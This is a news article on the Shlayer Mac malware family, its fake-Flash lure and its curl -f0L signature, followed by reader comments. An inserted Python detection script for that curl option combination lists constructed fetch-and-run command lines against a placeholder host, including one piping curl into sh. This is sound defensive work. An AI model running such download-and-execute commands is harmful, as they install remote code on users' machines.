Mac users are getting bombarded by laughably unsophisticated malware:
Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it's the number one threat encountered by users of Kaspersky Labs' antivirus programs for macOS.
Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by the Kaspersky Lab's Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.
An analysis Kaspersky Lab published on Thursday says that Shlayer is "a rather ordinary piece of malware" that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday's post said "is basically the calling card of the entire family."
Another banal detail about Shlayer is its previously mentioned infection method. It's seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.
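The "-f0L calling card" above is a usable detection hook, but only if the check survives the trivial reorderings the comments below debate (-f0L, -0fL, -L -f -0, or the long forms --fail, --http1.0 and --location all mean the same thing to curl). The following is an added example, not code from the article or from Kaspersky Lab: it tokenises shell command lines such as those a process-execution log or a downloaded stager script would contain, expands clustered curl short options, and flags any curl invocation that carries all three switches. The sample command lines are constructed for the example and are not real Shlayer artefacts; the list of curl switches that take an argument is a partial one chosen for illustration, and the example.invalid host is a placeholder.

```python
"""Flag curl invocations carrying the -f, -0 and -L switches together,
the option combination the Kaspersky Lab write-up calls Shlayer's calling
card. Added example; the command lines below are constructed, not real."""
import os
import shlex

# Constructed sample command lines (e.g. from a process-execution log).
SAMPLE_LINES = [
    'curl -f0L http://example.invalid/payload -o /tmp/p',          # canonical cluster
    '/usr/bin/curl -0fL http://example.invalid/p',                 # same switches, reordered
    'curl -L -f -0 http://example.invalid/p',                      # switches given separately
    'curl -fL http://example.invalid/p',                           # no -0: ordinary usage
    'curl --fail --http1.0 --location http://example.invalid/p',   # long-form equivalents
    'wget -q http://example.invalid/p',                            # not curl at all
    'curl -f0L https://example.invalid/p | sh',                    # curl feeding a shell
]

# Long forms of the three switches that make up the signature.
LONG_TO_SHORT = {'--fail': 'f', '--http1.0': '0', '--location': 'L'}
SIGNATURE = {'f', '0', 'L'}

# Partial list (an assumption for this example) of curl short options that
# consume an argument; inside a cluster such as "-o/tmp/p" everything after
# the letter is that argument, so cluster expansion must stop there.
OPTS_WITH_ARG = set('odHXuAebcCDEFKmPQrTUwxyYz')

# Tokens that end one command in a pipeline or command list.
SEPARATORS = {'|', ';', '&&', '||'}


def curl_invocations(tokens):
    """Yield the argument list of every curl command in a tokenised line."""
    args, in_curl = [], False
    for tok in tokens + ['|']:            # trailing sentinel flushes the last command
        if tok in SEPARATORS:
            if in_curl:
                yield args
            args, in_curl = [], False
        elif not in_curl and os.path.basename(tok) == 'curl':
            in_curl = True
        elif in_curl:
            args.append(tok)


def curl_short_flags(cmdline):
    """Return the set of single-letter curl switches used on a command line,
    expanding clusters (-f0L -> f, 0, L) and mapping the three long forms of
    interest to their short letters. Empty when curl is not invoked."""
    flags = set()
    try:
        tokens = shlex.split(cmdline)
    except ValueError:                    # unbalanced quotes: treat as no match
        return flags
    for args in curl_invocations(tokens):
        for arg in args:
            if arg in LONG_TO_SHORT:
                flags.add(LONG_TO_SHORT[arg])
            elif arg.startswith('-') and not arg.startswith('--') and len(arg) > 1:
                for letter in arg[1:]:    # clustered short options
                    flags.add(letter)
                    if letter in OPTS_WITH_ARG:
                        break             # rest of the token is this option's argument
    return flags


def is_shlayer_style(cmdline):
    """True when a curl invocation on the line carries -f, -0 and -L together,
    in any order and in either short or long form."""
    return SIGNATURE <= curl_short_flags(cmdline)


def scan(lines):
    """Return the command lines that match the signature."""
    return [line for line in lines if is_shlayer_style(line)]


if __name__ == '__main__':
    for line in scan(SAMPLE_LINES):
        print('flagged:', line)
```

The -0 (force HTTP/1.0) switch is the unusual part of the trio; -f and -L are common in legitimate scripts, so a rule keyed on the full combination rather than on any one switch keeps the false-positive rate manageable. Run over real process telemetry the match is a triage signal, not proof of infection; the Python-based variant the article mentions would need its own rule.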
(Score: 2) by Mojibake Tengu on Saturday January 25 2020, @09:27AM (3 children)
Options f,0,L are in natural order as they appear in the curl manpage. Anyone who needs to logically use those options could write -f0L.
Respect Authorities. Know your social status. Woke responsibly.
(Score: 2) by maxwell demon on Sunday January 26 2020, @08:05AM (2 children)
I just checked, and on my system -0 is described before -f in the man page. Which makes sense because generally digits are sorted before letters.
The Tao of math: The numbers you can count are not the real numbers.
(Score: 2) by Mojibake Tengu on Sunday January 26 2020, @09:20AM (1 child)
curl 7.67 on BSD.
I already checked the option order in the man page before my post. Even in --help listing, 0 is placed between h and i.
Are you sure you don't have some backdoored curl by other provisioning?
Respect Authorities. Know your social status. Woke responsibly.
(Score: 2) by maxwell demon on Wednesday January 29 2020, @01:31PM
Just tried --help, and there it is indeed between h and i. There it seems to be sorted by long option name.
Maybe the man pages on Linux and BSD are written by different people?
I'm pretty sure my curl is authentic as it is straight from the repositories.
With a web search, I even found a version of the man page where the digit options are listed last. [die.net]
And here is an online version with -0 coming early. [oracle.com]
The Tao of math: The numbers you can count are not the real numbers.